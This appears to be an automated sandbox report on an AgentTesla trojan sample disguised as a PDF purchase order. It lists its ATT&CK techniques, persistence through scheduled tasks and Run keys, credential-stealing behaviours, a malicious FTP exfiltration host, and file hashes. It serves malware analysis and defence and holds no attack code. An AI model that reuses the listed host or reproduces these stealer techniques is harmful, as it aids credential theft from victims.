                    Email AddressesDNS ServerDomain AccountsAt1
                    Registry Run Keys / Startup Folder                    		1
                    Scheduled Task/Job                    		3
                    Obfuscated Files or Information                    		1
                    Credentials in Registry                    		211
                    Security Software Discovery                    		SMB/Windows Admin Shares1
                    Email Collection                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                    Registry Run Keys / Startup Folder                    		12
                    Software Packing                    		NTDS1
                    Process Discovery                    		Distributed Component Object Model21
                    Input Capture                    		2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                    DLL Side-Loading                    		LSA Secrets141
                    Virtualization/Sandbox Evasion                    		SSH1
                    Clipboard Data                    		23
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    Application Window Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
                    Virtualization/Sandbox Evasion                    		DCSync1
                    System Network Configuration Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job111
                    Process Injection                    		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                    Hidden Files and Directories                    		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1518233 Sample: z38PO_20248099-1_pdf.exe Startdate: 25/09/2024 Architecture: WINDOWS Score: 100 65 ftp.haliza.com.my 2->65 67 api.ipify.org 2->67 73 Suricata IDS alerts for network traffic 2->73 75 Found malware configuration 2->75 77 Malicious sample detected (through community Yara rule) 2->77 79 11 other signatures 2->79 8 z38PO_20248099-1_pdf.exe 7 2->8         started        12 FrFvspxoHsPs.exe 5 2->12         started        14 sgxIb.exe 2->14         started        16 sgxIb.exe 2->16         started        signatures3 process4 file5 57 C:\Users\user\AppData\...\FrFvspxoHsPs.exe, PE32 8->57 dropped 59 C:\Users\...\FrFvspxoHsPs.exe:Zone.Identifier, ASCII 8->59 dropped 61 C:\Users\user\AppData\Local\...\tmpD40B.tmp, XML 8->61 dropped 63 C:\Users\...\z38PO_20248099-1_pdf.exe.log, ASCII 8->63 dropped 95 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 8->95 97 Uses schtasks.exe or at.exe to add and modify task schedules 8->97 99 Adds a directory exclusion to Windows Defender 8->99 18 z38PO_20248099-1_pdf.exe 16 5 8->18         started        23 powershell.exe 23 8->23         started        37 3 other processes 8->37 101 Multi AV Scanner detection for dropped file 12->101 103 Machine Learning detection for dropped file 12->103 25 FrFvspxoHsPs.exe 12->25         started        27 schtasks.exe 12->27         started        105 Injects a PE file into a foreign processes 14->105 29 sgxIb.exe 14->29         started        31 schtasks.exe 14->31         started        33 sgxIb.exe 16->33         started        35 schtasks.exe 16->35         started        signatures6 process7 dnsIp8 69 ftp.haliza.com.my 110.4.45.197, 21, 49711, 49712 EXABYTES-AS-APExaBytesNetworkSdnBhdMY Malaysia 18->69 71 api.ipify.org 172.67.74.152, 443, 49709, 49714 CLOUDFLARENETUS United States 18->71 53 C:\Users\user\AppData\Roaming\...\sgxIb.exe, PE32 18->53 dropped 55 C:\Users\user\...\sgxIb.exe:Zone.Identifier, ASCII 18->55 dropped 81 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->81 83 Tries to steal Mail credentials (via file / registry access) 18->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->85 87 Loading BitLocker PowerShell Module 23->87 39 conhost.exe 23->39         started        41 WmiPrvSE.exe 23->41         started        43 conhost.exe 27->43         started        89 Tries to harvest and steal ftp login credentials 29->89 91 Tries to harvest and steal browser information (history, passwords, etc) 29->91 93 Installs a global keyboard hook 29->93 45 conhost.exe 31->45         started        47 conhost.exe 35->47         started        49 conhost.exe 37->49         started        51 conhost.exe 37->51         started        file9 signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    z38PO_20248099-1_pdf.exe66%ReversingLabsWin32.Trojan.AgentTesla
                    z38PO_20248099-1_pdf.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe100%Joe Sandbox ML
                    C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe66%ReversingLabsWin32.Trojan.AgentTesla
                    C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe66%ReversingLabsWin32.Trojan.AgentTesla

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    https://api.ipify.org/0%URL Reputationsafe
                    https://api.ipify.org0%URL Reputationsafe
                    https://account.dyn.com/0%URL Reputationsafe
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                    http://ftp.haliza.com.my0%Avira URL Cloudsafe
                    https://api.ipify.org/t0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ipify.org
                    		172.67.74.152
                    		truefalse
                      		unknown
                      ftp.haliza.com.my
                      		110.4.45.197
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://api.ipify.org/false
                        • URL Reputation: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.ipify.orgz38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://account.dyn.com/z38PO_20248099-1_pdf.exe, 00000000.00000002.1447223274.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1617599669.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://ftp.haliza.com.myz38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002A3C000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002B13000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002C35000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.0000000002AD3000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.00000000035CD000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003681000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.000000000358E000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.00000000033EB000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.00000000030E5000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.00000000030BC000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000330B000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000325F000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://api.ipify.org/tz38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namez38PO_20248099-1_pdf.exe, 00000000.00000002.1446067123.0000000002C02000.00000004.00000800.00020000.00000000.sdmp, z38PO_20248099-1_pdf.exe, 0000000A.00000002.3860883657.000000000284C000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000B.00000002.1494492070.0000000002FF5000.00000004.00000800.00020000.00000000.sdmp, FrFvspxoHsPs.exe, 0000000F.00000002.3860059633.0000000003351000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000010.00000002.1556961678.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000013.00000002.1620262791.0000000003071000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000015.00000002.1639610353.0000000002625000.00000004.00000800.00020000.00000000.sdmp, sgxIb.exe, 00000018.00000002.3861351736.000000000304C000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        110.4.45.197
                        		ftp.haliza.com.myMalaysia
                        		46015EXABYTES-AS-APExaBytesNetworkSdnBhdMYtrue
                        172.67.74.152
                        		api.ipify.orgUnited States
                        		13335CLOUDFLARENETUSfalse

                        General Information

                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1518233
                        Start date and time:2024-09-25 14:41:23 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 11m 47s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:28
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:z38PO_20248099-1_pdf.exe
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winEXE@33/20@2/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 100%
                        • Number of executed functions: 482
                        • Number of non-executed functions: 5
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Override analysis time to 240000 for current running targets taking high CPU consumption

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtCreateKey calls found.
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Report size getting too big, too many NtReadVirtualMemory calls found.
                        • VT rate limit hit for: z38PO_20248099-1_pdf.exe

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        08:42:19API Interceptor5893430x Sleep call for process: z38PO_20248099-1_pdf.exe modified
                        08:42:20API Interceptor41x Sleep call for process: powershell.exe modified
                        08:42:25API Interceptor1288139x Sleep call for process: FrFvspxoHsPs.exe modified
                        08:42:32API Interceptor4739059x Sleep call for process: sgxIb.exe modified
                        13:42:21Task SchedulerRun new task: FrFvspxoHsPs path: C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                        13:42:23AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                        13:42:31AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sgxIb C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        110.4.45.197z64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                          rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                            PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              172.67.74.152file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                              • api.ipify.org/
                              file.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/
                              zE7Ken4cFt.dllGet hashmaliciousQuasarBrowse
                              • api.ipify.org/
                              FormPlayer.exeGet hashmaliciousUnknownBrowse
                              • api.ipify.org/

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              ftp.haliza.com.myz64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              api.ipify.orgz64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 172.67.74.152
                              Ze1Ueabtx5.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 172.67.74.152
                              Documenti di spedizione 0009333000459595995.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                              • 104.26.13.205
                              rMT103SwiftCopyoFPayment.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              https://www.canva.com/design/DAGRqYHU9fM/qLQ4eWyHLFZd4WO6lX1hvg/view?utm_content=DAGRqYHU9fM&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                              • 104.26.13.205
                              Zoom_Invite.call-660194855683.wsfGet hashmaliciousXWormBrowse
                              • 104.26.12.205
                              reported_account_violation-pdf-67223451.wsfGet hashmaliciousXWormBrowse
                              • 104.26.13.205
                              COMMERCAIL INVOICE AND TNT AWB TRACKING INVOICE.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.12.205
                              http://pub-647efec841f2469ea102ef18827f7780.r2.dev/secure_response.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                              • 104.26.12.205
                              http://pub-afa55f53401b48e6ad155daf536ad34c.r2.dev/utility_base.htmlGet hashmaliciousGreatness Phishing Kit, HTMLPhisherBrowse
                              • 104.26.13.205

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              EXABYTES-AS-APExaBytesNetworkSdnBhdMYz64MT103_126021720924_pdf.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              file.exeGet hashmaliciousClipboard Hijacker, Stealc, VidarBrowse
                              • 103.6.198.219
                              PO#005.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 103.6.198.178
                              purchase order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 103.6.198.178
                              rPO_20248099-112,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              PO__20248099-1 12,300PCS.exeGet hashmaliciousAgentTeslaBrowse
                              • 110.4.45.197
                              https://hijauanhills.com.my/wp-content/upgrade/index.php?uid=qvc-communication@qvcjp.comGet hashmaliciousUnknownBrowse
                              • 43.252.214.42
                              https://hijauanhills.com.my/wp-content/upgrade/index.php?uid=qvc-communication@qvcjp.comGet hashmaliciousUnknownBrowse
                              • 43.252.214.42
                              https://trk.klclick3.com/ls/click?upn=%75001%2ec09Q0Iaa5JBKaMwLC9cMjFMyHYn-2B6EZxbTX-2FaxXPaGrg5dbeFH4fD3EuQFBIIXLREGZ-2FcOKC34mnxZPxIQx7XghFIqGaXY6alnacloe8xRo-3DgClE_PsKyq3SDuMFd2Bvwnm7-2BcmPfS0aZrbIGf331gXNHUSe-2BhQgqUpFiX3w7h5jUnRd6n-2FE8HERNVnz6BOvKs-2F6ulrBAPhqq4y7BxG-2Bd6kG7tLUxcOuHiFWpTHeDGZUnvDZvP6FM52V2kHQ6WJAZs6KQLxfqZHXfS07MTZdpG9vj-2FyhrEPsl2OqZg5lzEsrvURNsKVvDj6AmF6Sc1Z4lZAW7CGdtCrIGzdnodzXHJg2ktm7ptAUSv125vaGKXpRXhbzmAu5lE-2BvgScXpoVnTswlbot2XqG-2FJI21NuECHLJYOtT13mulLg3LyC43ioSpIwstqzATUDNosl6pb3KNNf3I-2F07dDO2NkZcrZt-2B2G5uraxeQ-3D#/?/c3plbGxAam9uZXNqdW5jdGlvbi5jb20=Get hashmaliciousUnknownBrowse
                              • 103.6.198.53
                              https://berobv.nl/Get hashmaliciousUnknownBrowse
                              • 103.6.198.176
                              CLOUDFLARENETUS0x000e00000001da78-93.exeGet hashmaliciousLummaCBrowse
                              • 172.67.206.221
                              FAKTURA_.EXE.exeGet hashmaliciousDarkTortilla, Snake KeyloggerBrowse
                              • 188.114.97.3
                              rTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 188.114.97.3
                              rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 188.114.97.3
                              rPROFORMAINVOICE-PO_ATS_1036pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                              • 188.114.96.3
                              http://hye.com.mxGet hashmaliciousUnknownBrowse
                              • 104.18.10.207
                              https://EIB.m365-microsoft.com/i/d62c9121ed3e64f32bfe6dd51720150ce?fp=a8b756deca&twc=000066140762&e=afdbb4a2cfc14765bdcddb3a4ff152c6Get hashmaliciousUnknownBrowse
                              • 1.1.1.1
                              https://u47138932.ct.sendgrid.net/ls/click?upn=u001.WHU40Igm1lAOGuvv-2FdvXEBICo64I-2Fww-2F4GhUU-2BYAtPpG2Rlg5ZO0npuLCJUQ0th-2Bv7jiqZNwXXutQuRULDJ5gA-3D-3D49di_E3jX7UdwUvWW16GmiaKN7FkCRVuYellJjDDE2zc2thlrACmxCpdiqjVeZzrtBBh53HG3diRIaSJROX1IVISX2iuKwpzfFmWnT0Yv1uEikhvgBfP7OQn0yqcVecNZ3iDwFjYYj57BnYIOhDpPo4MTwnwub6p2B5GRghh6ChqtreR11LT6WpJx-2FcmruvU1xEGNLDsifcIUnQKgQbqTLc4vnXmCfsmjYgCm0e-2BBQgOUn5pv0HzAWJQ2BG0SXnTVfDBoH7QelwM6AwzcQNq8DXMWRJRTblKEKJioXfF0zfGmiftnizJbYIB8-2FjHg4nz-2F3zTP2EmyELP4FGD6jsuXOmnDDCfknw4WJyH33Agg5tAwQOjntCHuuZi6vcl6SPJyVNsvolpRM7Yp8Ri5gQksC1pfj2rC-2F45nF8bhK3EHs4VmIWpDl-2FDZcfZMpI50qinszZEtLmF7m8gZv-2BkUvlKpTvm-2FfTLIu2iSZcVBG0sGFMm-2FoR-2BR6O0SBoX53s7fd6zbqziWuPg2tLfHjJjraKZEwqpZnbaHuJ-2F-2F-2FWqvTwBSaffuKdeB6vfA0b-2FDnJiZ4Bk6qAzG08EbfonMWuWwAbXPPNlz7-2FPhMaRZIj5qYmImFuGJee8m0N-2Bht2q6llhNWiP4ZMXXLYVHteEexUAugvquxsOpI6vqnHcQgc-2FVpUHpOp2BMHZLkW2qrpJH8BCyfTdYFr6iQwd7HzQDsc429SLZFXzK95V1E-2FXG1a3sGhwhN8XAY0nnJSxwwGLn2jP8dTD9xQetC2exPt5-2F-2FqgJQ5bXuDHvFZTrNGco6SJBPNyS9ynWfuYpvIc2j9CNYEYBIXjxGimgN-2BOoaRDXClnNK36cnrLjExHKdCfLb6GbsD03m-2Bb3lMo-3DGet hashmaliciousUnknownBrowse
                              • 104.18.161.117
                              rBSH200924_pdf.cmd.exeGet hashmaliciousVIP KeyloggerBrowse
                              • 188.114.97.3
                              t1RVQb98yT.exeGet hashmaliciousS400 RATBrowse
                              • 162.159.135.232

                              JA3 Fingerprints

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              3b5074b1b5d032e5620f69f9f700ff0erTEKL__FTALEPVEF__YATTEKL__F___xlsx.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 172.67.74.152
                              rTEKL__FTALEPVEF__YATTEKL__F__.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                              • 172.67.74.152
                              9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              http://hye.com.mxGet hashmaliciousUnknownBrowse
                              • 172.67.74.152
                              batman.ps1Get hashmaliciousUnknownBrowse
                              • 172.67.74.152
                              9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152
                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 172.67.74.152

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\FrFvspxoHsPs.exe.log

                              Download File
                              Process:C:\Users\user\AppData\Roaming\FrFvspxoHsPs.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\sgxIb.exe.log

                              Download File
                              Process:C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\z38PO_20248099-1_pdf.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\z38PO_20248099-1_pdf.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:true
